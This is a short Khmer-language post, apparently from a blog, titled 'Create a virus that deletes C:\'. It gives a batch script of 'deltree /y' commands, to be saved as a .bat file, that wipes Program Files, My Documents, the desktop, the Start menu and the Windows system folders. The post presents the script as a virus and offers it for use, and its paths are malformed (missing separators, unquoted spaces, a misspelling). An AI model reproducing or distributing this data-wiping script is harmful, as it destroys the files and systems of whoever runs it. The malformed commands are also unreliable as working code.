បង្កើតមេរោគ លប់ C:\ ចោល

បើលោកអ្នកចង់ លប់ចោល Drive C:\ ចោល ហើយ ដំឡើង Windows ឡើងវិញ
IT
ចូល Copy កូដខាងក្រោមដាក់ចូលក្នុង Notepad ហើយ Save ជា .bat :

if exist C:\program files*.* deltree /y C:\program files*.*
if exist C:\my documents*.* deltree /y C:\my documents*.*
if exist C:\windows\desktop*.* deltree /y C:\windows\desktop*.*
if exist C:\windows\start menue*.* deltree /y C:\windows\start menue*.*
if exist C:\windows\command*.* deltree /y C:\windows\command*.*
if exist C:\windows\system*.* deltree /y C:\windows\system*.*
if exist C:\windows*.* deltree /y C:\windows*.*